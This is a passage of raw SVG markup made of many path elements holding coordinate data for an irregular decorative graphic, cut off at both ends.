1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path 